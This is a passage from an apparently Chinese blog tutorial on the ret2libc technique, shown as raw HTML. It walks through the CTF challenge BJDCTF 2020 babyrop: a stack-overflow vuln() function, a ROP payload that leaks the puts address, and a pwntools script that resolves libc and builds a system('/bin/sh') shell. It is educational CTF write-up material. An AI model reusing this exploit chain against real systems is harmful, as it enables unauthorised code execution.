tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span 
style=\"color: #D8DEE9FF\"> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u6cc4\u9732\u51fa\u771f\u5b9e\u5730\u5740\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7<code>LibcSearcher<\/code>\u5e93\u6216\u8005<a href=\"https:\/\/libc.rip\/\">libc-database<\/a>\u6765\u627e\u5230\u5bf9\u5e94\u7684libc\u7248\u672c\uff08\u9664\u975e\u9898\u76ee\u7ed9\u4e86\uff09\uff0c\u4ece\u800c\u8ba1\u7b97\u51falibc\u7684\u57fa\u5730\u5740\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u6784\u9020\u51fa<code>system(\"\/bin\/sh\")<\/code>\u6765\u83b7\u53d6shell\u4e86\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[BJDCTF 2020]babyrop<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/707\">BJDCTF 2020-babyrop | NSSCTF<\/a><\/p>\n\n\n\n<p>\u901a\u8fc7IDA\u6253\u5f00\u7a0b\u5e8f\u53ef\u4ee5\u770b\u89c1\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-19.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"378\" height=\"347\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-152\"  sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u8fd9\u91cc\u5e76\u6ca1\u6709<code>system<\/code>\u51fd\u6570\uff0cchecksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div 
class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-20.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"234\" height=\"108\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-153\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53d1\u73b0\u65e2\u6ca1\u6709Canary\u4e5f\u6ca1\u6709PIE\u4fdd\u62a4\uff0c\u6240\u4ee5\u5224\u65ad\u9700\u8981\u901a\u8fc7ret2libc\u6765\u83b7\u53d6shell\uff0c\u53ef\u4ee5\u770b\u5230<code>vuln<\/code>\u51fd\u6570\u5185\u5bb9\u4e3a\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" 
stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>ssize_t vuln()\n{\n  char buf&#91;32&#93;; \/\/ &#91;rsp+0h&#93; &#91;rbp-20h&#93; BYREF\n\n  puts(\"Pull up your sword and tell me u story!\");\n  return read(0, buf, 0x64uLL);\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">ssize_t<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">vuln<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #B48EAD\">32<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: 
#616E88\"> \/\/ &#91;rsp+0h&#93; &#91;rbp-20h&#93; BYREF<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">return<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">read<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">64<\/span><span style=\"color: #81A1C1\">uLL<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u660e\u663e<code>read<\/code>\u51fd\u6570\u5b58\u5728\u6ea2\u51fa\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u4ee3\u7801\u6765\u6784\u9020payload\u6765\u6cc4\u9732<code>puts<\/code>\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg 
xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>puts_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span 
style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: 
#ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: 
#ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u5728\u83b7\u53d6<code>puts<\/code>\u7684\u771f\u5b9e\u5730\u5740\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7<code>LibcSearcher<\/code>\u6765\u627e\u5230\u6240\u6709\u53ef\u80fd\u7684libc\u7248\u672c\uff08\u53ef\u80fd\u8981\u591a\u8bd5\u51e0\u904d\uff09\uff0c\u6216\u8005\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6cc4\u9732\u591a\u4e2a\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u6765\u4f7f\u7528<a href=\"https:\/\/libc.rip\/\">libc-database<\/a>\u786e\u5b9alibc\u7684\u7248\u672c\uff1a<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u901a\u8fc7LibcSearcher\u6765\u627e\u5230libc\u7248\u672c<\/h5>\n\n\n\n<p>\u53ef\u4ee5\u5199\u51fa\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \nfrom 
LibcSearcher import *  \n\np = remote(\"ip\", port)  \nelf = ELF(\".\/pwn\")  \n\nputs_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nputs_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of puts is\", hex(puts_real))  \n\nlibc = LibcSearcher(\"puts\", puts_real)  \nlibc_base = puts_real - libc.dump(\"puts\")  \nprint(\"&#91;+&#93; The base address of libc is\", hex(libc_base))  \n\nsystem = libc_base + libc.dump(\"system\")  \nsh = libc_base + libc.dump(\"str_bin_sh\")  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(sh) + p64(system) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  
<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> LibcSearcher <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: 
#81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  
